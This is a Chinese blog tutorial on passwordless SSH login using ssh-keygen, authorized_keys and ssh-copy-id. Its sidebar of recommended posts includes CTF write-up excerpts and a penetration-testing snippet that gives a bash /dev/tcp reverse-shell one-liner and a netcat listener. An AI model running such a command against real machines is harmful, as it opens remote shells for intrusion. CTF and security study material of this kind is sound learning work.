SSH-2:快捷免密访问服务器

最新推荐文章于 2024-04-15 22:24:20 发布
最新推荐文章于 2024-04-15 22:24:20 发布
阅读量148 收藏
点赞数
分类专栏: linux 文章标签: ssh
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Deeply_bless/article/details/112861761
版权

ssh-keygen参数说明:

-b:指定密钥长度;
-e:读取openssh的私钥或者公钥文件;
-C:添加注释;
-f:指定用来保存密钥的文件名;
-i:读取未加密的ssh-v2兼容的私钥/公钥文件,然后在标准输出设备上显示openssh兼容的私钥/公钥;
-l:显示公钥文件的指纹数据;
-N:提供一个新密语;
-P:提供(旧)密语;
-q:静默模式;
-t:指定要创建的密钥类型。

客户端配置

  1. 生成秘钥
    ssh-keygen -t rsa -C your@email.com  

  2. cd 到生成秘钥的目录下
    cd ~/.ssh/

  3. 该目录下有以下几个文件
    config,  id_rsa,  id_rsa.pub,  known_hosts

  4. 读取id_rsa.pub 的文件内容 ,并复制该内容
    cat id_rsa.pub

服务端配置

  1. 手动连接服务器
  2. 尝试进入
    cd ~/.ssh/authorized_keys

    若没有给文件,依次创建,并赋予写权限

  3. 将刚刚复制的本地 id_rsa.pub 的文件的内容粘贴到 authorized_keys 文件末尾
    vim authorized_keys

  4. 客户端执行
    ssh-copy-id User@IP
    输入密码,之后就可以免密别名登录

     

 

Deeply_bless
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF的Web真题学习整理(一)
CTF小白的博客
08-01 5043
目录WEB1—WarmUp (任意文件包含漏洞)WEB2—高明的黑客(fuzz脚本)WEB3—easy_tornado (服务端模板注入(ssti攻击))WEB4—Hack World(时间盲注)WEB5—admin(unicode欺骗)WEB6—piapiapia (一个源码中有防止sql注入的反序列化漏洞) BUU上的题基本都是比赛真题,还是很有借鉴意义的,安利一波https://buuoj...
BUUCTF__web题解合集(十)
风过江南乱的博客
09-27 1668
1、[CISCN2019 华东南赛区]Web11 2、[BJDCTF 2nd]Schrödinger 3、[BJDCTF 2nd]duangShell 4、[BSidesCF 2019]Futurella 5、[网鼎杯 2018]Comment
[BUUCTF][蓝帽杯 2021]One Pointer PHP
cosmoslin的博客
11-15 1683
考点 PHP数组溢出 绕过open_basedir 攻击php-fpm绕过disable functions Suid提权 源码 user.php <?php class User{ public $count; } ?> add_api.php <?php include "user.php"; if($user=unserialize($_COOKIE["data"])){ $count[++$user->count]=1; if($count[]=1){ $user
[CTF]-反弹shell[2]
Mr.木Mu
05-27 1557
[二]反弹shell的本质开放端口(腾讯云,宝塔面板)什么是反弹shell反弹shell的本质是什么bash -i/dev/tcp/ip/port实例1:实例2:交互重定向>&、&>常见的反弹shell 的语句怎么理解1234结束极客大挑战where_is_my_FUMO 开放端口(腾讯云,宝塔面板) 测试反弹shell 需要保证端口开放 打开腾讯云 --> 打开安全组 --> 添加规则 添加入站规则 完成之后–> 一键放通 然后进入宝塔面板
BUUCTF------Overlong
qq_64558075的博客
12-06 311
1.老规矩,拿到题目文件,查壳 搜索基本信息,32位文件(用32位ida打开),下面一段我也看不懂。 运行附件 看到这段话后面有个:,猜测后面还有东西。 2。拖入ida之中 发现就3个函数 F5跟进查看伪代码 算了,看不懂,退出来 发现这个sub_401160函数只处理了unk_402008的前28位,跟进unk_402008 跟进发现不只有28位,那么就验证了刚开始的猜想,后面还有东西 接下来就是修改代码,使它输出后面的东西 3.使用OD 要知...
tmate-ssh-server:tmate SSH服务器
05-12
tmate-ssh-server是的服务器端部分。 用法 参见 。 Docker镜像 提供了一个映像: 以下环境变量用于配置服务器SSH_KEYS_PATH (强制性):ssh密钥所在的路径。 HAS_WEBSOCKET :如果存在tmate-websocket服务器...
ssh-inscribe:SSH CA客户端服务器
05-10
ssh-inscribe-SSH CA客户端/服务器 注意:此软件处于Alpha阶段。 命令和API可以更改。 反馈将不胜感激。 概述 ssh-inscribe可以帮助您管理对组织SSH主机的安全访问。 它通过利用来实现此目的。 客户端/服务器模型...
在配置SSH免密登录时报错:/usr/bin/ssh-copy-id: ERROR: failed to open ID file ‘/root/.pub’: 没有那个文件或目录
01-07
[root@hadoop1 sbin]# ssh-copy-id hadoop1 /usr/bin/ssh-copy-id: ERROR: failed to open ID file '/root/.pub': 没有那个文件或目录 (to install the contents of '/root/.pub' anyway, look at the -f option) ...
ssh-run:在多台服务器上依次运行命令
05-15
刀搜索-i“ chef_evironment:staging” 2> / dev / null | ssh-run -H--echo hello world 启动一个shell以运行多个命令: ssh-run -h host1 -h host2 要求 在Python 2.6及更高版本(包括Python 3)上运行。 执照...
ssh-askpass:用于OS XmacOS的ssh-askpass
05-01
ssh-askpass 用于OS X / macOS的ssh-askpass。 可在(至少)10.7以上版本(包括莫哈韦沙漠)中使用 用于接受(或拒绝)使用通过ssh-add -c添加到SSH身份验证代理的私钥。 如果在操作系统升级后使用ssh-askpass遇到...
[2024CISCN]国赛初赛WEB题目复现_2024国赛初赛unzip题目复现
m0_74918915的博客
04-12 1500
其中返回机器的硬件地址(MAC地址),而返回特定于平台的唯一ID。4.: 将所有上述信息串联并进行哈希,得到一个SHA1哈希值。这里,函数将公开信息和私有信息合并为一个序列,然后这个序列中的每一项都被加入到哈希中。添加了一个额外的“salt”值,以确保最终的哈希值是独特的。5.将哈希值转换为16进制的字符串形式,并从中取出前20个字符。然后,它前面添加了"__wzd"前缀来生成最终的。再通过查找关键字,找到set_cookie方法。
[2024CISCN]国赛初赛WEB题目复现_2024国赛初赛unzip题目复现(1)
最新发布
04-15 1057
现在我们知道,既然hint提示需要调用JSONObject的put,而该类并没有readObject方法,故而需要找到一个能够调用任意类的put方法的链子作为gadget的一部分,而JSONObject正好也属于Map的实现类,从常用的反序列化类中,符合条件的就是。通过transform间接地实现控制value,并且key也是任意类型,但是在warp方法中,只传进了此方法中的value,再结合hint要利用Myexpect类的方法,猜测要将value赋值为Myexpect对象。
BUUCTF-WEB 【CISCN2019 华东南赛区】Web11 1
qq_36410265的博客
02-08 296
其实打开这张页面,我并不知道这道题是什么类型。只好先用bp去请求这两个接口。请求xff的时候,我添加了 xff头,值为127.0.0.1。回显了127.0.0.1。我就猜到是模板注入题了,加上页面上的关键字。,Smarty模板注入题,找了几个payload,没什么过滤,直接就回显了。以为这道题跟ikun那道题一样,考的知识点很多,是我想得复杂了。
多种姿势反弹shell
Brucetg的博客
08-20 7054
在渗透过程中,在拿到webshell后,如果目标主机是Linux服务器,一般我们都会选择反弹shell以方便后续操作,在此总结下反弹shell的几种姿势。 0x01. Bash反弹 攻击者主机上执行监听: nc -lvvp port 目标主机上执行: bash -i &amp;gt;&amp;amp; /dev/tcp/x.x.x.x/port 0&amp;gt;&amp;amp;1 简单解释下: bash ...
Linux -soname深入理解
u010510069的专栏
10-19 1011
-Wl 表示后面的参数也就是-soname,libhello.so.1直接传给连接器ld进行处理。实际上,每一个库都有一个soname,当连接器发现它正 在查找的程序库中有这样一个名称,连接器便会将soname嵌入连结中的二进制文件内,而不是它正在运行的实际文件名,在程序执行期间,程序会查找拥有 soname名字的文件,而不是库的文件名,换句话说,soname是库的区分标志。 这样做的
libx264 for android编译(重点是看那个configure如何配置)
小疯子
03-21 736
1.2 使用ndk编译x264 1. 下载源码并编译 $ cd /opt/android/ndk/android-ndk-r10e/resources $ git clone http://git.videolan.org/git/x264.git $ cd x264 修改configure文件 $ vim configure 将下面的这四句: else ech...
Configure交叉编译
小白的IT旅程
10-18 5078
交叉编译某个Application 或者 Library时,通常需要 ./configure 来生成对应的 Makefile ./configure 最关键的三个选项是: --host=HOST 是指定软件运行的系统平台.如果没有指定,将会运行`config.guess'来检测. --build=BUILD 是指定软件包安装的系统平台.如果没有指定,默认值将是'--host'选项的值. --...
介绍-soname
ty的专栏
12-18 546
介绍linux的soname技术,该技术用于解决动态库多版本共存及程序版本依赖的问题。
如何让自己configure找到需要的库?
热门推荐
sunnyleevip的专栏
04-04 1万+
今天编译一个开源库libartnet的使用demo时候遇到一个问题,之前没遇到过的,记录一下。 其实很简单,这个开源库编译安装时,我习惯性地不把它安装到/usr或者/usr/local下,而是安装到/opt下,只是为了以后不想要的时候删掉比较方便,结果编译artnet的demo的时候就编译不了了,因为这个demo程序也是通过configure make 这样的步骤去编译的。具体问题就是在执行co
ssh-keygen实现节点免密登录
03-14
ssh-keygen是一个用于生成SSH密钥对的命令行工具,它可以实现节点之间的免密登录。下面是使用ssh-keygen实现节点免密登录的步骤: 1. 打开终端或命令行窗口,输入以下命令来生成SSH密钥对: ``` ssh-keygen -t ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值